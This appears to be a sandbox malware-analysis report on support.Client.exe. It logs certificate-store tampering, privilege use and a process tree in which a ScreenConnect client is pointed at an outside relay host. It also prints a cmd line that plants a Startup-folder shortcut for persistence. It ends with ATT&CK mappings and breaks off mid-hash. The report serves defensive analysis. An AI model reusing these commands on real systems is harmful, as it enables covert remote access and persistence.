df923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	support.Client.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	support.Client.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	support.Client.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	support.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	support.Client.exe

Suspicious behavior: AddClipboardFormatListener 4 IoCs

pid	Process
4952	ScreenConnect.WindowsClient.exe
2400	ScreenConnect.WindowsClient.exe
1780	ScreenConnect.WindowsClient.exe
1792	ScreenConnect.WindowsClient.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
1756	msiexec.exe
1756	msiexec.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
4168	Tx.pif
4168	Tx.pif

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	228	dfsvc.exe
Token: SeDebugPrivilege	3100	ScreenConnect.ClientService.exe
Token: SeDebugPrivilege	4952	ScreenConnect.WindowsClient.exe
Token: SeDebugPrivilege	2296	ScreenConnect.ClientSetup.exe
Token: SeShutdownPrivilege	4352	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4352	msiexec.exe
Token: SeSecurityPrivilege	1756	msiexec.exe
Token: SeCreateTokenPrivilege	4352	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4352	msiexec.exe
Token: SeLockMemoryPrivilege	4352	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4352	msiexec.exe
Token: SeMachineAccountPrivilege	4352	msiexec.exe
Token: SeTcbPrivilege	4352	msiexec.exe
Token: SeSecurityPrivilege	4352	msiexec.exe
Token: SeTakeOwnershipPrivilege	4352	msiexec.exe
Token: SeLoadDriverPrivilege	4352	msiexec.exe
Token: SeSystemProfilePrivilege	4352	msiexec.exe
Token: SeSystemtimePrivilege	4352	msiexec.exe
Token: SeProfSingleProcessPrivilege	4352	msiexec.exe
Token: SeIncBasePriorityPrivilege	4352	msiexec.exe
Token: SeCreatePagefilePrivilege	4352	msiexec.exe
Token: SeCreatePermanentPrivilege	4352	msiexec.exe
Token: SeBackupPrivilege	4352	msiexec.exe
Token: SeRestorePrivilege	4352	msiexec.exe
Token: SeShutdownPrivilege	4352	msiexec.exe
Token: SeDebugPrivilege	4352	msiexec.exe
Token: SeAuditPrivilege	4352	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4352	msiexec.exe
Token: SeChangeNotifyPrivilege	4352	msiexec.exe
Token: SeRemoteShutdownPrivilege	4352	msiexec.exe
Token: SeUndockPrivilege	4352	msiexec.exe
Token: SeSyncAgentPrivilege	4352	msiexec.exe
Token: SeEnableDelegationPrivilege	4352	msiexec.exe
Token: SeManageVolumePrivilege	4352	msiexec.exe
Token: SeImpersonatePrivilege	4352	msiexec.exe
Token: SeCreateGlobalPrivilege	4352	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeShutdownPrivilege	3016	MsiExec.exe
Token: SeDebugPrivilege	2880	ScreenConnect.ClientService.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe
Token: SeRestorePrivilege	1756	msiexec.exe
Token: SeTakeOwnershipPrivilege	1756	msiexec.exe

Suspicious use of FindShellTrayWindow 31 IoCs

pid	Process
4952	ScreenConnect.WindowsClient.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
4168	Tx.pif
4168	Tx.pif
4168	Tx.pif
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe
400	Mozanm.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 1512 wrote to memory of 228	1512	support.Client.exe	84
PID 1512 wrote to memory of 228	1512	support.Client.exe	84
PID 228 wrote to memory of 632	228	dfsvc.exe	87
PID 228 wrote to memory of 632	228	dfsvc.exe	87
PID 228 wrote to memory of 632	228	dfsvc.exe	87
PID 632 wrote to memory of 832	632	ScreenConnect.WindowsClient.exe	88
PID 632 wrote to memory of 832	632	ScreenConnect.WindowsClient.exe	88
PID 632 wrote to memory of 832	632	ScreenConnect.WindowsClient.exe	88
PID 3100 wrote to memory of 4952	3100	ScreenConnect.ClientService.exe	90
PID 3100 wrote to memory of 4952	3100	ScreenConnect.ClientService.exe	90
PID 3100 wrote to memory of 4952	3100	ScreenConnect.ClientService.exe	90
PID 3100 wrote to memory of 2400	3100	ScreenConnect.ClientService.exe	91
PID 3100 wrote to memory of 2400	3100	ScreenConnect.ClientService.exe	91
PID 3100 wrote to memory of 2400	3100	ScreenConnect.ClientService.exe	91
PID 4952 wrote to memory of 4612	4952	ScreenConnect.WindowsClient.exe	93
PID 4952 wrote to memory of 4612	4952	ScreenConnect.WindowsClient.exe	93
PID 4952 wrote to memory of 4612	4952	ScreenConnect.WindowsClient.exe	93
PID 4612 wrote to memory of 400	4612	ScreenConnect.WindowsClient.exe	94
PID 4612 wrote to memory of 400	4612	ScreenConnect.WindowsClient.exe	94
PID 400 wrote to memory of 968	400	Mozanm.exe	95
PID 400 wrote to memory of 968	400	Mozanm.exe	95
PID 968 wrote to memory of 4168	968	cmd.exe	97
PID 968 wrote to memory of 4168	968	cmd.exe	97
PID 968 wrote to memory of 4168	968	cmd.exe	97
PID 4168 wrote to memory of 5064	4168	Tx.pif	98
PID 4168 wrote to memory of 5064	4168	Tx.pif	98
PID 4168 wrote to memory of 5064	4168	Tx.pif	98
PID 3100 wrote to memory of 2296	3100	ScreenConnect.ClientService.exe	100
PID 3100 wrote to memory of 2296	3100	ScreenConnect.ClientService.exe	100
PID 3100 wrote to memory of 2296	3100	ScreenConnect.ClientService.exe	100
PID 2296 wrote to memory of 4352	2296	ScreenConnect.ClientSetup.exe	101
PID 2296 wrote to memory of 4352	2296	ScreenConnect.ClientSetup.exe	101
PID 2296 wrote to memory of 4352	2296	ScreenConnect.ClientSetup.exe	101
PID 1756 wrote to memory of 3016	1756	msiexec.exe	105
PID 1756 wrote to memory of 3016	1756	msiexec.exe	105
PID 1756 wrote to memory of 3016	1756	msiexec.exe	105
PID 3016 wrote to memory of 3652	3016	MsiExec.exe	106
PID 3016 wrote to memory of 3652	3016	MsiExec.exe	106
PID 3016 wrote to memory of 3652	3016	MsiExec.exe	106
PID 2880 wrote to memory of 1780	2880	ScreenConnect.ClientService.exe	108
PID 2880 wrote to memory of 1780	2880	ScreenConnect.ClientService.exe	108
PID 2880 wrote to memory of 1792	2880	ScreenConnect.ClientService.exe	109
PID 2880 wrote to memory of 1792	2880	ScreenConnect.ClientService.exe	109
PID 4168 wrote to memory of 348	4168	Tx.pif	110
PID 4168 wrote to memory of 348	4168	Tx.pif	110
PID 4168 wrote to memory of 348	4168	Tx.pif	110
PID 4168 wrote to memory of 348	4168	Tx.pif	110
PID 4168 wrote to memory of 348	4168	Tx.pif	110

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3424
- C:\Users\Admin\AppData\Local\Temp\support.Client.exe
  "C:\Users\Admin\AppData\Local\Temp\support.Client.exe"
  2⤵
  - Manipulates Digital Signatures
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:228
  - - C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.WindowsClient.exe"
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:632
    - - C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.ClientService.exe
        
        "C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.ClientService.exe" "?y=Guest&h=edcthmedu.serveblog.net&p=8041&s=f7966cef-4335-4600-89a4-f5a3714fafd8&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Untitled%20Session" "1"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:832
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:5064
- C:\Users\Admin\AppData\Local\Temp\jsc.exe
  C:\Users\Admin\AppData\Local\Temp\jsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:348

C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.ClientService.exe" "?y=Guest&h=edcthmedu.serveblog.net&p=8041&s=f7966cef-4335-4600-89a4-f5a3714fafd8&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Untitled%20Session" "1"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100
- C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.WindowsClient.exe" "RunRole" "ff2a47cf-9dac-4e92-8e09-db37301ddd65" "User"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.WindowsClient.exe" "RunFile" "C:\Users\Admin\Documents\Support\Temp\Mozanm.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4612
  - - C:\Users\Admin\Documents\Support\Temp\Mozanm.exe
      "C:\Users\Admin\Documents\Support\Temp\Mozanm.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Tx.pif "C:\Users\Admin\AppData\Local\Temp\s""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:968
      - C:\Users\Admin\AppData\Local\Temp\Tx.pif
        
        C:\Users\Admin\AppData\Local\Temp\Tx.pif "C:\Users\Admin\AppData\Local\Temp\s"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4168
- C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\PW3K10D3.CM8\E4BXWJXO.OCE\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\ScreenConnect.WindowsClient.exe" "RunRole" "64a6a472-6600-4b24-bfc0-e62f2ffaf0b5" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: AddClipboardFormatListener
  PID:2400
- C:\Windows\TEMP\ScreenConnect\23.2.9.8466-171849be-2ac0-4761-bd7e-c5640d035773\ScreenConnect.ClientSetup.exe
  "C:\Windows\TEMP\ScreenConnect\23.2.9.8466-171849be-2ac0-4761-bd7e-c5640d035773\ScreenConnect.ClientSetup.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\Windows\TEMP\setup.msi"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4352

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C6ACBC9A46CE5213C237316FDB36C30B E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3016
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSIF5E9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240645781 2 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:3652

C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=edcthmedu.serveblog.net&p=8041&s=0f8c9a42-9255-4cc9-a86d-495b4545c3f7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&t=mobic"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe" "RunRole" "1c963070-f354-4ed0-a307-46cc5a277c84" "User"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  PID:1780
- C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe" "RunRole" "26f163af-fe13-43c2-aaeb-a3296defb815" "System"
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: AddClipboardFormatListener
  PID:1792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57f4e2.rbs

Filesize
213KB

MD5
fe13ad0db2b4e67924796e7a3c2715bd

SHA1
